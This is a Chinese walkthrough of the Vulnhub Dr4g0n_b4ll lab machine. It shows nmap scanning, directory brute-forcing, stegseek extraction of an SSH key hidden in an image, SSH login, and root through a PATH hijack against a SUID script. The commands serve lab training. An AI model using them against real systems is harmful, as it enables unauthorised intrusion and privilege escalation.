【Vulnhub系列】Vulnhub_Dr4g0n_b4ll 靶场渗透(原创)

【Vulnhub系列靶场】Vulnhub_Dr4g0n_b4ll靶场渗透

原文转载已经过授权

原文链接:Lusen的小窝 - 学无止尽,不进则退 (lusensec.github.io)

一、环境搭建

选择打开.ovf 文件

配置名称和路径

打开后调整网络连接模式为【NAT】即可

二、信息收集

1、主机发现

复制代码
nmap.exe -sn 192.168.31.*

2、端口扫描

1、快速粗略的端口扫描

复制代码
nmap.exe -F 192.168.31.65

2、详细端口扫描

复制代码
nmap.exe -sT --min-rate 10000 -p- 192.168.31.65
nmap.exe -sU --min-rate 10000 -p- 192.168.31.65

3、详细扫描和漏洞探测

复制代码
nmap.exe -sV -A -p22,80 192.168.31.65
复制代码
nmap.exe --script=vuln -p22,80 192.168.31.65

只发现了一个robots.txt 的文件

3、web 目录探测

复制代码
gobuster.exe dir -u http://192.168.31.65 -w d:\theperson\dirs\dicc.txt -b 404,403 --no-error

4、web 框架探测

复制代码
whatweb http://192.168.31.65

三、获取shell立足点

1、查看敏感信息

1、主页

2、robots.txt 文件

进行base64解码:

3、源代码


2、DRAGON BALL目录信息

1、secret.txt 文件

保存下来做目录爆破

并无收获

2、Vulnhub 目录

3、Vulnhub/login.html:是一个虚假的登录页面

4、aj.jpg:一张黑客的图片

3、图片信息提取

提取图片隐写信息

复制代码
stegseek aj.jpg /usr/share/wordlists/rockyou.txt

4、获取shell 立足点

此时拿到一个ssh密钥,欠缺用户名,此处的xmen 是用户名

我们直接用密钥进行登录

复制代码
ssh xmen@192.168.31.65 -i id_rsa

成功拿到shell

四、提权至root

1、查看敏感文件

shell 是一个suid权限,发现可以执行环境变量中的ps 命令,那么可以尝试用环境变量劫持来提权

2、提权至root

复制代码
cd /tmp
echo "/bin/bash" > ps
chmod 777 ps
echo $PATH
export PATH=/tmp:$PATH
cd ~/script
./script

原文转载已经过授权

更多文章请访问原文链接:Lusen的小窝 - 学无止尽,不进则退 (lusensec.github.io)

相关推荐
小李独爱秋43 分钟前
计算机网络经典问题透视:当路由器需要同时连接以太网和ATM网络时,需要添加什么硬件?
运维·网络协议·计算机网络·网络安全·智能路由器
国服第二切图仔2 小时前
Rust开发之错误处理与日志记录结合(log crate使用)
网络·算法·rust
天***88962 小时前
驱动精灵、驱动人生、NVIDIA专业显卡驱动、360驱动大师、联想乐驱动,电脑驱动修复工具大全
网络·电脑·负载均衡
AORO20252 小时前
三防平板三防是指哪三防?适合应用在什么场景?
服务器·网络·智能手机·电脑·1024程序员节
王道长服务器 | 亚马逊云3 小时前
AWS + SeyouCMS:海外资源站的高性能部署实战
服务器·网络·数据库·云计算·软件构建·aws
泷羽Sec-静安3 小时前
Less-7 GET-Dump into outfile-String
android·前端·网络·sql·安全·web安全
一瓢一瓢的饮 alanchan3 小时前
HTTPS接口国密安全设计-示例
网络协议·安全·https·国密 国家商用密码·数字签名 数字证书·sm2 sm4 sm3·对称加密 非对称加密
、BeYourself4 小时前
【随机访问介质访问控制-1】为什么纯 ALOHA 效率不到 20%?3 大随机访问 MAC 协议拆解
网络·计算机网络·数据链路层
CodeLongBear4 小时前
计算机网络Day01
网络·学习笔记·计算机网路
jenchoi4134 小时前
【2025-10-31】软件供应链安全日报:最新漏洞预警与投毒预警情报汇总
网络·安全·web安全·网络安全